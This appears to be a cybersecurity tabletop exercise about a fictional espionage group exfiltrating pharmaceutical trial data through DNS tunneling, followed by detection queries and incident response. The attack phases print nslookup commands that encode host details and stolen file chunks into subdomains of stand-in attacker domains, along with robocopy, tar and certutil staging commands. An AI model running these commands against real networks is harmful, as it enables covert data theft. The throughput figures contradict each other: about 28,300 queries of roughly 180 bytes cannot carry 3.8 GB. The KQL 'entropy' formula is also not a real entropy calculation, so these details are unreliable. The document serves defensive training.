SC-090: DNS Tunneling Exfiltration — Operation SILENT PIPE¶
Scenario Overview¶
| Field | Detail |
|---|---|
| ID | SC-090 |
| Category | Network Security / Exfiltration / Covert Channels |
| Severity | Critical |
| ATT&CK Tactics | Command and Control, Exfiltration, Defense Evasion |
| ATT&CK Techniques | T1071.004 (Application Layer Protocol: DNS), T1048.003 (Exfiltration Over Alternative Protocol: Unencrypted/Obfuscated Non-C2 Protocol), T1568.002 (Dynamic Resolution: Domain Generation Algorithms) |
| Target Environment | Global pharmaceutical research firm with 5,200 employees, hybrid on-prem/cloud infrastructure, and proprietary drug trial data worth an estimated $2.1B in R&D investment |
| Difficulty | ★★★★★ |
| Duration | 3–4 hours |
| Estimated Impact | 3.8 GB of proprietary clinical trial data exfiltrated via DNS TXT records over 14 days; C2 channel operating undetected through corporate DNS resolvers; internal DNS infrastructure weaponized as exfiltration relay; 340-hour dwell time before detection |
Narrative¶
Helix Pharmaceuticals, a fictional global pharmaceutical research company, operates a hybrid infrastructure with on-premises Active Directory (ad.helix.example.com), Microsoft 365, and AWS for computational chemistry workloads. The company's crown jewels are Phase III clinical trial datasets for three drug candidates — data that represents over $2.1B in cumulative R&D investment.
The network architecture uses a traditional DNS hierarchy: endpoint resolvers point to internal DNS servers (10.10.1.50, 10.10.1.51 running Windows DNS), which forward unresolved queries to Cloudflare (1.1.1.1) and Google (8.8.8.8) as upstream resolvers. DNS traffic (UDP/53, TCP/53) is permitted outbound through the firewall with minimal inspection — a common configuration that creates the covert channel exploited in this scenario.
In March 2026, a threat actor group designated TUNNEL VIPER — a state-sponsored espionage group specializing in covert exfiltration via protocol tunneling — targets Helix Pharmaceuticals to steal clinical trial data. The attack begins with a spearphishing payload that establishes a DNS-based C2 channel, uses DNS TXT and CNAME record tunneling to bypass all network security controls, and exfiltrates 3.8 GB of compressed research data encoded in DNS queries over a 14-day period.
Attack Flow¶
graph TD
A[Phase 1: Initial Compromise<br/>Spearphish with DNS tunnel implant] --> B[Phase 2: DNS C2 Establishment<br/>TXT record-based command and control]
B --> C[Phase 3: Internal Reconnaissance<br/>Network mapping via DNS C2 channel]
C --> D[Phase 4: Lateral Movement to Research Network<br/>Pivot to clinical trial data servers]
D --> E[Phase 5: Data Staging & Compression<br/>Identify and package target data]
E --> F[Phase 6: DNS Tunneling Exfiltration<br/>Encode data in DNS CNAME/TXT queries]
F --> G[Phase 7: Domain Rotation & Evasion<br/>DGA-based domain switching to avoid blocklists]
G --> H[Phase 8: Detection & Response<br/>DNS anomaly detection + tunnel deconstruction]Phase Details¶
Phase 1: Initial Compromise — Spearphishing with DNS Tunnel Implant¶
ATT&CK Technique: T1071.004 (Application Layer Protocol: DNS)
TUNNEL VIPER sends a targeted spearphishing email to a senior research scientist, Dr. Sarah Kim (s.kim@helix.example.com), using a lure document themed as a conference invitation from a legitimate pharmacology society. The document contains a macro that downloads and executes a lightweight DNS tunnel agent — a custom implant that communicates exclusively via DNS queries, generating no HTTP/HTTPS traffic that would be flagged by the web proxy or NGFW.
# Simulated initial compromise (educational only)
# Spearphishing email delivered to target
From: conferences@pharmacology-society.example.com (spoofed)
To: s.kim@helix.example.com
Subject: Invitation: 2026 Global Pharmacology Summit — Speaker Confirmation
Attachment: Summit_2026_Speaker_Invitation.docm (macro-enabled)
# The macro downloads the DNS tunnel agent via a one-time HTTPS pull
# from a legitimate cloud storage service (to bypass URL inspection),
# then executes it in memory
# Simulated implant behavior (conceptual - not functional code):
# 1. Agent resolves a TXT record to retrieve initial configuration
$ nslookup -type=TXT init.config.t1.data-analytics-cdn.example.com
# Response:
# "v=cfg1 s=180 j=8 e=b64 c=txt m=5120"
# Translation: sleep=180s, jitter=8s, encoding=base64, channel=TXT, max_payload=5120
# 2. Agent registers with C2 by encoding host info in subdomain
$ nslookup -type=A \
aGVsaXgtd3MtMDE0Ny5hZC5oZWxpeC5leGFtcGxl.reg.t1.data-analytics-cdn.example.com
# The subdomain is base64-encoded: "helix-ws-0147.ad.helix.example"
# The attacker's authoritative DNS server logs the registration
# 3. Implant runs as a scheduled task disguised as a system process
# Task name: "Microsoft\Windows\WindowsUpdate\AU Check"
# Binary: %LOCALAPPDATA%\Microsoft\WindowsApps\dnshelper.exe
# No network connections visible in process monitor (only DNS resolution)
# Implant host details (synthetic):
Host: helix-ws-0147.ad.helix.example.com (10.10.42.147)
User: s.kim (Research Scientist, Oncology Division)
OS: Windows 11 Enterprise 23H2
Domain: ad.helix.example.com
DNS Server: 10.10.1.50 (internal recursive resolver)
Phase 2: DNS C2 Channel Establishment¶
ATT&CK Technique: T1071.004 (Application Layer Protocol: DNS)
The implant establishes a bidirectional C2 channel using DNS queries and responses. Commands from the attacker are encoded in TXT record responses, while command output and data from the implant are encoded in the subdomain portion of DNS queries. The attacker operates an authoritative DNS server for the domain data-analytics-cdn.example.com, giving them full control over query responses.
# Simulated DNS C2 channel (educational only)
# The implant polls for commands by querying a TXT record
# Command polling (every 180 seconds ± 8 seconds jitter):
$ nslookup -type=TXT cmd.agent01.t1.data-analytics-cdn.example.com
# Response (base64-encoded command):
# "d2hvYW1pICYmIGlwY29uZmlnIC9hbGwgJiYgbmV0IHVzZXI="
# Decoded: "whoami && ipconfig /all && net user"
# Command output returned via encoded subdomain queries:
# Output is split into chunks, base64-encoded, and sent as subdomains
# Each query carries ~180 bytes of payload (DNS label limit: 63 chars x 3 labels)
$ nslookup -type=A \
aGVsaXhccy5raW0.01.r.agent01.t1.data-analytics-cdn.example.com
$ nslookup -type=A \
MTAuMTAuNDIuMTQ3.02.r.agent01.t1.data-analytics-cdn.example.com
$ nslookup -type=A \
V2luZG93cyBOVCAx.03.r.agent01.t1.data-analytics-cdn.example.com
# ... (multiple queries to transmit full output)
# The attacker's DNS server reassembles the chunks:
# Chunk 01: "helix\s.kim"
# Chunk 02: "10.10.42.147"
# Chunk 03: "Windows NT 1..."
# Complete output assembled from 12 DNS queries
# DNS traffic characteristics:
# - Query type: A records (subdomains) for data upload
# - Response type: TXT records for command download
# - Frequency: ~20 queries per polling cycle
# - Subdomain entropy: high (base64 encoded)
# - Domain: data-analytics-cdn.example.com (looks like a CDN)
# - All traffic passes through corporate DNS resolver (10.10.1.50)
# which forwards to upstream resolvers → authoritative DNS server
Phase 3: Internal Reconnaissance via DNS C2¶
ATT&CK Technique: T1071.004 (Application Layer Protocol: DNS)
Using the DNS C2 channel, TUNNEL VIPER conducts internal reconnaissance of Helix's network. The attacker maps the Active Directory structure, identifies research data servers, and locates the clinical trial database infrastructure. All reconnaissance commands and their outputs traverse the network exclusively as DNS traffic.
# Simulated internal reconnaissance (educational only)
# All commands sent/received via DNS C2 channel
# C2 command: Enumerate Active Directory structure
# (sent via TXT record response, executed on compromised host)
> nltest /dclist:ad.helix.example.com
DC: \\dc01.ad.helix.example.com (PDC) Site: HQ-NewYork
DC: \\dc02.ad.helix.example.com Site: Lab-Boston
# C2 command: Find research file servers
> net view /domain:ad.helix.example.com | findstr -i "research data trial"
\\research-fs01.ad.helix.example.com Research Data — Oncology
\\research-fs02.ad.helix.example.com Research Data — Cardiology
\\trial-db01.ad.helix.example.com Clinical Trial Database
# C2 command: Enumerate shares on research file server
> net view \\research-fs01.ad.helix.example.com
Share name Type Comment
-----------------------------------------
OncologyTrials$ Disk Phase III Trial Data
SharedDocs Disk Department Shared Documents
Archives Disk Completed Trials Archive
# C2 command: Identify network segmentation
> tracert research-fs01.ad.helix.example.com
1 <1ms 10.10.42.1 (default gateway — workstation VLAN)
2 1ms 10.10.0.1 (core router)
3 1ms 10.10.100.20 (research-fs01 — research VLAN)
# C2 command: Check current user's group memberships
> whoami /groups | findstr -i "research trial"
AD\helix.example.com\Research-Oncology-RO Group S-1-5-21-...
AD\helix.example.com\Trial-Data-Viewers Group S-1-5-21-...
# CRITICAL FINDING: s.kim has read access to Phase III trial data
# via "Research-Oncology-RO" and "Trial-Data-Viewers" groups
# No lateral movement needed — direct access to target data
# Network map (assembled from reconnaissance):
# 10.10.42.0/24 — Workstation VLAN (compromised host: 10.10.42.147)
# 10.10.100.0/24 — Research VLAN (target: 10.10.100.20, 10.10.100.21)
# 10.10.200.0/24 — Database VLAN (trial-db01: 10.10.200.10)
# 10.10.1.0/24 — Infrastructure (DNS: 10.10.1.50, DC: 10.10.1.10)
Phase 4: Lateral Movement to Research Data¶
ATT&CK Technique: T1071.004 (Application Layer Protocol: DNS)
Because Dr. Kim's account has legitimate read access to research file shares, TUNNEL VIPER does not need to escalate privileges or move laterally through additional hosts. The attacker accesses the clinical trial data directly from the compromised workstation using the user's existing credentials and group memberships. This makes the data access appear as normal user activity.
# Simulated data access (educational only)
# Attacker accesses research data using s.kim's legitimate permissions
# C2 command: List clinical trial data directories
> dir \\research-fs01.ad.helix.example.com\OncologyTrials$ /s /b
\\research-fs01\OncologyTrials$\PhaseIII_HX-4471\
\\research-fs01\OncologyTrials$\PhaseIII_HX-4471\PatientData\
\\research-fs01\OncologyTrials$\PhaseIII_HX-4471\EfficacyResults\
\\research-fs01\OncologyTrials$\PhaseIII_HX-4471\SafetyReports\
\\research-fs01\OncologyTrials$\PhaseIII_HX-4471\FDA_Submissions\
\\research-fs01\OncologyTrials$\PhaseIII_HX-4892\
\\research-fs01\OncologyTrials$\PhaseIII_HX-4892\PatientData\
\\research-fs01\OncologyTrials$\PhaseIII_HX-4892\EfficacyResults\
# C2 command: Assess data volume
> dir \\research-fs01.ad.helix.example.com\OncologyTrials$ /s
Total Files Listed:
4,287 File(s) 12,847,392,000 bytes (12.8 GB uncompressed)
# Target data identified:
# - HX-4471: Phase III Oncology Drug Candidate (8.1 GB)
# - HX-4892: Phase III Oncology Drug Candidate (4.7 GB)
# - Total raw data: 12.8 GB across 4,287 files
# - Estimated R&D value: $2.1B investment
Phase 5: Data Staging and Compression¶
ATT&CK Technique: T1048.003 (Exfiltration Over Alternative Protocol)
TUNNEL VIPER stages the data for exfiltration by compressing and encrypting the clinical trial files. The attacker prioritizes the highest-value data (efficacy results, FDA submissions) and compresses it to minimize the volume that must traverse the DNS tunnel. The staging uses built-in Windows tools to avoid deploying additional utilities.
# Simulated data staging (educational only)
# Attacker compresses target data for DNS tunnel exfiltration
# C2 command: Create staging directory
> mkdir %LOCALAPPDATA%\Microsoft\WindowsApps\cache
# C2 command: Copy priority data to staging
> robocopy \\research-fs01.ad.helix.example.com\OncologyTrials$\PhaseIII_HX-4471\EfficacyResults ^
%LOCALAPPDATA%\Microsoft\WindowsApps\cache\e1 /E /MT:4 /NP /LOG:NUL
# Copied: 847 files, 2.1 GB
> robocopy \\research-fs01.ad.helix.example.com\OncologyTrials$\PhaseIII_HX-4471\FDA_Submissions ^
%LOCALAPPDATA%\Microsoft\WindowsApps\cache\f1 /E /MT:4 /NP /LOG:NUL
# Copied: 312 files, 1.8 GB
> robocopy \\research-fs01.ad.helix.example.com\OncologyTrials$\PhaseIII_HX-4892\EfficacyResults ^
%LOCALAPPDATA%\Microsoft\WindowsApps\cache\e2 /E /MT:4 /NP /LOG:NUL
# Copied: 623 files, 1.5 GB
# C2 command: Compress with built-in Windows tar (avoids deploying 7z)
> tar -czf %LOCALAPPDATA%\Microsoft\WindowsApps\cache\update.dat ^
-C %LOCALAPPDATA%\Microsoft\WindowsApps\cache e1 f1 e2
# Compressed: 5.4 GB → 3.8 GB (update.dat)
# C2 command: Split into 5KB chunks for DNS tunnel transport
> certutil -encode %LOCALAPPDATA%\Microsoft\WindowsApps\cache\update.dat ^
%LOCALAPPDATA%\Microsoft\WindowsApps\cache\update.b64
# Base64 encoded: 3.8 GB → 5.1 GB (base64 overhead)
# Staging complete:
# Priority data: 3.8 GB compressed (1,782 files from 2 drug candidates)
# Base64 encoded: 5.1 GB
# Estimated DNS queries needed: ~28,300 (180 bytes payload per query)
# Estimated exfil time at 30 queries/minute: ~15.7 hours
# Spread over 14 days: ~1.1 hours/day = ~33 queries/minute during business hours
Phase 6: DNS Tunneling Exfiltration¶
ATT&CK Technique: T1048.003 (Exfiltration Over Alternative Protocol)
TUNNEL VIPER begins systematic exfiltration of the compressed data through DNS queries. The data is base64-encoded and embedded in subdomain labels of DNS queries. Each query carries approximately 180 bytes of payload data. The exfiltration is throttled to blend with normal DNS traffic volume, operating during business hours when DNS query volume is naturally higher.
# Simulated DNS tunneling exfiltration (educational only)
# Data encoded in subdomain labels of DNS queries
# Exfiltration query structure:
# <chunk_data>.<sequence_number>.<session_id>.d.<domain>
#
# chunk_data: 3 subdomain labels x 63 chars = 189 chars base64 (~141 bytes)
# sequence_number: 5-digit sequence for reassembly
# session_id: 8-char hex session identifier
# d: marks this as data (vs. 'r' for response, 'cmd' for command)
# Example exfiltration queries (synthetic data):
$ nslookup -type=A \
UEsDBBQAAAAIAGVMeVkAAA.AAAACABQAAAGN0Zi90.cmFuc2FjdGlvbl9sb2c.00001.a3f8b2c1.d.data-analytics-cdn.example.com
$ nslookup -type=A \
LmNzdgAAAADYBAAAUEsD.BBQAAAAIAGVMeVkAAAA.AAAjAAAAY3RmL3RyYW5z.00002.a3f8b2c1.d.data-analytics-cdn.example.com
$ nslookup -type=A \
YWN0aW9uX2xvZy5jc3YA.AAADOAUAAFBLAwQUAAAA.CABlTHlZAAAAAAAAIwAA.00003.a3f8b2c1.d.data-analytics-cdn.example.com
# Exfiltration rate control:
# - Business hours (08:00-18:00 local): 30 queries/minute
# - Off-hours: 0 queries (implant sleeps)
# - Weekends: 0 queries
# - Per-day data moved: ~270 MB (30 q/min × 180 bytes × 600 min)
# - Total exfil duration: 14 business days
# The attacker's authoritative DNS server:
# - Receives all queries for *.data-analytics-cdn.example.com
# - Strips subdomain labels
# - Decodes base64 payload
# - Reassembles chunks by sequence number
# - Responds with NXDOMAIN (to appear as failed DNS lookups)
# or a valid A record (203.0.113.1) to appear normal
# Exfiltration progress (synthetic log from attacker infrastructure):
# Day 1: sequences 00001-01500 (270 MB) cumulative: 270 MB
# Day 2: sequences 01501-03000 (270 MB) cumulative: 540 MB
# Day 3: sequences 03001-04500 (270 MB) cumulative: 810 MB
# ...
# Day 14: sequences 26701-28300 (288 MB) cumulative: 3.8 GB ← COMPLETE
# From the corporate DNS resolver's perspective, these are normal
# recursive DNS queries for a .example.com domain that it cannot
# resolve internally, so it forwards them upstream
Phase 7: Domain Rotation and Evasion¶
ATT&CK Technique: T1568.002 (Dynamic Resolution: Domain Generation Algorithms)
To avoid detection via domain blocklisting, TUNNEL VIPER rotates the C2/exfiltration domain every 3 days using a deterministic domain generation algorithm (DGA). Both the implant and the attacker's infrastructure compute the same daily domain using a shared seed, ensuring continuity without hardcoded domain lists. The generated domains are registered in advance and configured with the attacker's authoritative DNS server.
# Simulated DGA domain rotation (educational only)
# The implant computes the active domain using date + seed
# DGA logic (conceptual pseudocode — not functional):
# seed = "TUNNELVIPER2026"
# date_str = "20260401"
# domain = md5(seed + date_str)[:12] + ".example.com"
# Domain rotation schedule (synthetic):
# Days 1-3: data-analytics-cdn.example.com
# Days 4-6: cloud-metrics-svc.example.com
# Days 7-9: edge-telemetry-api.example.com
# Days 10-12: global-perf-monitor.example.com
# Days 13-14: app-health-beacon.example.com
# Each domain:
# - Registered 30+ days before use (avoids "newly registered" detection)
# - Uses a name resembling legitimate cloud/CDN infrastructure
# - Has valid NS records pointing to attacker's authoritative DNS
# - Has a plausible A record (203.0.113.0/24 range) for the apex domain
# Additional evasion techniques:
# 1. Query type mixing: alternates between A, AAAA, TXT, CNAME queries
# 2. Subdomain label length variation: randomizes between 40-63 chars
# 3. TTL manipulation: C2 responses have short TTL (30s) to prevent caching
# 4. Query volume throttling: stays below statistical anomaly thresholds
# 5. NXDOMAIN responses: many queries return NXDOMAIN (appears as
# failed lookups for non-existent subdomains — common legitimate behavior)
# The combination of low query rate, domain rotation, and realistic
# domain names makes this exfiltration channel extremely difficult
# to detect without specialized DNS analytics
Phase 8: Detection & Response¶
The attack is detected after 14 days through a combination of DNS analytics and anomaly detection:
Channel 1 (Day 12): DNS Query Entropy Analysis — A newly deployed DNS security analytics platform flags sustained high-entropy subdomain queries to a single parent domain. The base64-encoded subdomains have consistently high Shannon entropy (>4.5 bits/char), which is atypical for legitimate DNS names.
Channel 2 (Day 13): DNS Query Volume Anomaly — The analytics platform identifies that data-analytics-cdn.example.com and three related domains have received 25,000+ unique subdomain queries from a single internal host (10.10.42.147) over 12 days — far exceeding normal DNS patterns for any single domain.
Channel 3 (Day 14): Threat Intelligence Correlation — A threat intelligence feed flags cloud-metrics-svc.example.com as associated with TUNNEL VIPER infrastructure. Retrospective DNS log analysis confirms the full domain rotation sequence and the scope of exfiltration.
# Simulated detection timeline (educational only)
[2026-04-12 14:30:00 UTC] DNS ANALYTICS — HIGH ENTROPY SUBDOMAIN ALERT
Alert: DNS_SUBDOMAIN_ENTROPY_ANOMALY
Details:
- Parent domain: global-perf-monitor.example.com
- Source host: 10.10.42.147 (helix-ws-0147)
- Average subdomain entropy: 4.72 bits/char (threshold: 4.0)
- Unique subdomains queried: 4,200 in 3 days
- Query pattern: consistent 30 queries/minute during business hours
- Record types: A (78%), TXT (22%)
Severity: HIGH
Action: DNS team investigation
[2026-04-13 09:15:00 UTC] DNS ANALYTICS — VOLUME ANOMALY
Alert: SINGLE_HOST_EXCESSIVE_QUERIES_TO_DOMAIN
Details:
- Source host: 10.10.42.147
- Domains queried (related):
data-analytics-cdn.example.com (days 1-3)
cloud-metrics-svc.example.com (days 4-6)
edge-telemetry-api.example.com (days 7-9)
global-perf-monitor.example.com (days 10-12)
- Total unique subdomain queries: 25,847
- Estimated data encoded: 3.8+ GB
- Pattern: DGA with 3-day rotation
Severity: CRITICAL
Action: Host isolation + forensic acquisition
[2026-04-14 07:00:00 UTC] THREAT INTELLIGENCE — INFRASTRUCTURE MATCH
Alert: KNOWN_THREAT_ACTOR_INFRASTRUCTURE
Source: Commercial threat intel feed
Details:
- Domain: cloud-metrics-svc.example.com
- Associated threat actor: TUNNEL VIPER
- Campaign: pharmaceutical sector espionage
- IOC confidence: HIGH
Action: Full incident response activation
Detection Queries:
// KQL — Detect high-entropy DNS subdomain queries (DNS tunneling indicator)
DnsEvents
| where TimeGenerated > ago(24h)
| extend SubdomainParts = split(Name, ".")
| extend ParentDomain = strcat(SubdomainParts[-2], ".", SubdomainParts[-1])
| extend Subdomain = substring(Name, 0, indexof(Name, ParentDomain) - 1)
| where strlen(Subdomain) > 30
| extend Entropy = log2(pow(countof(Subdomain, "[a-z]") > 0 ? 26.0 : 1.0, 1)
+ pow(countof(Subdomain, "[A-Z]") > 0 ? 26.0 : 1.0, 1)
+ pow(countof(Subdomain, "[0-9]") > 0 ? 10.0 : 1.0, 1))
| summarize QueryCount = count(),
UniqueSubdomains = dcount(Subdomain),
AvgSubdomainLen = avg(strlen(Subdomain)),
Sources = make_set(ClientIP)
by ParentDomain, bin(TimeGenerated, 1h)
| where UniqueSubdomains > 100 and AvgSubdomainLen > 40
| project TimeGenerated, ParentDomain, QueryCount, UniqueSubdomains,
AvgSubdomainLen, Sources
// KQL — Detect single host querying excessive unique subdomains
DnsEvents
| where TimeGenerated > ago(7d)
| extend SubdomainParts = split(Name, ".")
| extend ParentDomain = strcat(SubdomainParts[-2], ".", SubdomainParts[-1])
| summarize UniqueSubdomains = dcount(Name),
QueryCount = count(),
FirstSeen = min(TimeGenerated),
LastSeen = max(TimeGenerated)
by ClientIP, ParentDomain
| where UniqueSubdomains > 500
| extend DurationHours = datetime_diff('hour', LastSeen, FirstSeen)
| extend QueriesPerHour = QueryCount / max_of(DurationHours, 1)
| project ClientIP, ParentDomain, UniqueSubdomains, QueryCount,
DurationHours, QueriesPerHour
// KQL — Detect DNS DGA-like domain rotation from a single host
DnsEvents
| where TimeGenerated > ago(14d)
| extend SubdomainParts = split(Name, ".")
| extend ParentDomain = strcat(SubdomainParts[-2], ".", SubdomainParts[-1])
| where strlen(tostring(SubdomainParts[0])) > 30
| summarize DomainsUsed = dcount(ParentDomain),
Domains = make_set(ParentDomain),
TotalQueries = count()
by ClientIP
| where DomainsUsed > 3 and TotalQueries > 1000
| project ClientIP, DomainsUsed, TotalQueries, Domains
// KQL — Detect DNS TXT record queries to uncommon domains at volume
DnsEvents
| where TimeGenerated > ago(24h)
| where QueryType == "TXT" or QueryType == 16
| extend SubdomainParts = split(Name, ".")
| extend ParentDomain = strcat(SubdomainParts[-2], ".", SubdomainParts[-1])
| where ParentDomain !in ("google.com", "microsoft.com", "amazonaws.com",
"cloudflare.com", "office.com", "_dmarc.*", "_spf.*")
| summarize TXTQueries = count(),
UniqueNames = dcount(Name),
Sources = make_set(ClientIP)
by ParentDomain, bin(TimeGenerated, 1h)
| where TXTQueries > 50 or UniqueNames > 20
| project TimeGenerated, ParentDomain, TXTQueries, UniqueNames, Sources
# SPL — Detect high-entropy DNS subdomain queries (DNS tunneling indicator)
index=dns sourcetype=dns
| rex field=query "^(?<subdomain>.+?)\.(?<parent_domain>[^.]+\.[^.]+)$"
| where len(subdomain) > 30
| bin _time span=1h
| stats count as query_count,
dc(subdomain) as unique_subdomains,
avg(len(subdomain)) as avg_subdomain_len,
values(src_ip) as sources
by parent_domain, _time
| where unique_subdomains > 100 AND avg_subdomain_len > 40
| table _time, parent_domain, query_count, unique_subdomains,
avg_subdomain_len, sources
# SPL — Detect single host querying excessive unique subdomains
index=dns sourcetype=dns
earliest=-7d
| rex field=query "^(?<subdomain>.+?)\.(?<parent_domain>[^.]+\.[^.]+)$"
| stats dc(query) as unique_subdomains,
count as query_count,
min(_time) as first_seen,
max(_time) as last_seen
by src_ip, parent_domain
| where unique_subdomains > 500
| eval duration_hours=round((last_seen - first_seen)/3600, 1)
| eval queries_per_hour=round(query_count/max(duration_hours, 1), 1)
| table src_ip, parent_domain, unique_subdomains, query_count,
duration_hours, queries_per_hour
# SPL — Detect DNS DGA-like domain rotation from a single host
index=dns sourcetype=dns
earliest=-14d
| rex field=query "^(?<subdomain>.+?)\.(?<parent_domain>[^.]+\.[^.]+)$"
| where len(subdomain) > 30
| stats dc(parent_domain) as domains_used,
values(parent_domain) as domains,
count as total_queries
by src_ip
| where domains_used > 3 AND total_queries > 1000
| table src_ip, domains_used, total_queries, domains
# SPL — Detect DNS TXT record queries to uncommon domains at volume
index=dns sourcetype=dns record_type=TXT
| rex field=query "^(?<subdomain>.+?)\.(?<parent_domain>[^.]+\.[^.]+)$"
| where NOT match(parent_domain, "(google\.com|microsoft\.com|amazonaws\.com|cloudflare\.com)")
| bin _time span=1h
| stats count as txt_queries,
dc(query) as unique_names,
values(src_ip) as sources
by parent_domain, _time
| where txt_queries > 50 OR unique_names > 20
| table _time, parent_domain, txt_queries, unique_names, sources
Incident Response:
# Simulated incident response (educational only)
[2026-04-14 08:00:00 UTC] ALERT: DNS Exfiltration Incident Response activated
[2026-04-14 08:15:00 UTC] ACTION: Immediate containment
- Host 10.10.42.147 (helix-ws-0147) ISOLATED from network
- DNS sinkhole: all DGA domains pointed to internal sinkhole (10.10.1.200)
- Firewall rule: block all DNS queries to external resolvers from 10.10.42.0/24
- Passive DNS: full query log export for forensic timeline
[2026-04-14 09:00:00 UTC] ACTION: Forensic acquisition
- Full disk image of helix-ws-0147
- Memory dump captured (implant in running process)
- DNS resolver logs (10.10.1.50, 10.10.1.51) preserved for 30 days
- Network flow data from firewall for 14-day exfil window
[2026-04-14 10:00:00 UTC] ACTION: DNS infrastructure hardening
- DNS query logging ENABLED on all internal resolvers (was disabled)
- DNS security analytics: real-time entropy monitoring deployed
- Response Policy Zone (RPZ): newly registered domains blocked
- DNS-over-HTTPS: blocked at firewall to prevent resolver bypass
- Outbound DNS restricted to internal resolvers only (no direct 8.8.8.8/1.1.1.1)
[2026-04-14 12:00:00 UTC] ACTION: Data exposure assessment
Exfiltrated data: 3.8 GB compressed clinical trial data
- HX-4471 Phase III efficacy results (2.1 GB)
- HX-4471 FDA submission drafts (1.8 GB)
- HX-4892 Phase III efficacy results (partial)
Estimated R&D exposure: $2.1B in cumulative investment
Regulatory impact: potential FDA notification required
Dwell time: 14 days (initial compromise to detection)
DNS queries used for exfil: ~28,300
Domains rotated: 5 (3-day rotation cycle)
[2026-04-14 14:00:00 UTC] ACTION: Credential remediation
- s.kim account DISABLED and password reset
- All service accounts with access to research shares: passwords rotated
- Kerberos tickets: krbtgt double-reset (domain-wide)
- Research share ACLs: audited and tightened
Decision Points (Tabletop Exercise)¶
Decision Point 1 — Pre-Incident
Your organization allows DNS traffic (UDP/53, TCP/53) outbound through the firewall without deep inspection. How do you implement DNS security controls that can detect tunneling without breaking legitimate DNS resolution? What is the performance impact of DNS query inspection at scale?
Decision Point 2 — During Investigation
You detect high-entropy DNS queries from a single host but cannot confirm data exfiltration. The parent domain resolves to a valid IP and the host is a researcher's workstation with legitimate need for diverse DNS lookups. How do you distinguish between DNS tunneling and legitimate high-entropy DNS queries (e.g., CDN or cloud service lookups)?
Decision Point 3 — Scope Assessment
After confirming DNS tunneling exfiltration, you reconstruct the DNS query log and determine 3.8 GB of data was exfiltrated over 14 days. However, you cannot decrypt the exfiltrated data to confirm its contents. How do you assess the impact and determine which data was stolen? What file access logs do you correlate?
Decision Point 4 — Post-Incident
Your investigation reveals that DNS query logging was not enabled on internal resolvers, creating a forensic gap for the first 3 days of the attack. How do you ensure DNS visibility going forward? What DNS monitoring architecture do you deploy to detect tunneling in real time?
Lessons Learned¶
Key Takeaways
-
DNS is the most overlooked exfiltration channel — Most organizations permit unrestricted outbound DNS traffic. DNS tunneling tools can achieve 30+ KB/s throughput, sufficient to exfiltrate gigabytes of data over days. DNS query inspection and anomaly detection must be part of the network security baseline.
-
Shannon entropy of subdomain labels is the primary DNS tunneling indicator — Legitimate DNS names have low entropy (readable words, predictable patterns). Base64 or hex-encoded data in subdomains has consistently high entropy (>4.0 bits/char). Entropy-based detection has a low false positive rate when combined with volume thresholds.
-
DNS query logging must be enabled on all resolvers — Without DNS query logs, DNS tunneling is invisible to forensic investigation. Enable query logging on all internal DNS resolvers, forward logs to the SIEM, and retain for a minimum of 90 days. The storage cost is minimal compared to the forensic value.
-
DGA domain rotation defeats static blocklisting — Threat actors rotate C2/exfiltration domains faster than threat intelligence feeds can identify them. Detection must rely on behavioral analytics (entropy, volume, query patterns) rather than domain reputation alone.
-
Restrict outbound DNS to internal resolvers only — Block direct DNS queries to external resolvers (8.8.8.8, 1.1.1.1) at the firewall. Force all DNS through internal resolvers where queries can be logged, inspected, and filtered. Block DNS-over-HTTPS (DoH) and DNS-over-TLS (DoT) to prevent resolver bypass.
-
Low-and-slow exfiltration evades volume-based detection — TUNNEL VIPER throttled exfiltration to 30 queries/minute during business hours, staying below typical alert thresholds. Detection requires both per-host query volume tracking and cumulative analysis over multi-day windows.
MITRE ATT&CK Mapping¶
| Technique ID | Technique Name | Phase |
|---|---|---|
| T1071.004 | Application Layer Protocol: DNS | Command and Control (DNS C2 channel) |
| T1071.004 | Application Layer Protocol: DNS | Discovery (reconnaissance via DNS C2) |
| T1048.003 | Exfiltration Over Alternative Protocol: Unencrypted Non-C2 | Exfiltration (data encoded in DNS queries) |
| T1568.002 | Dynamic Resolution: Domain Generation Algorithms | Defense Evasion (C2 domain rotation) |
| T1074.001 | Data Staged: Local Data Staging | Collection (data compression and staging) |
| T1560.001 | Archive Collected Data: Archive via Utility | Collection (tar compression) |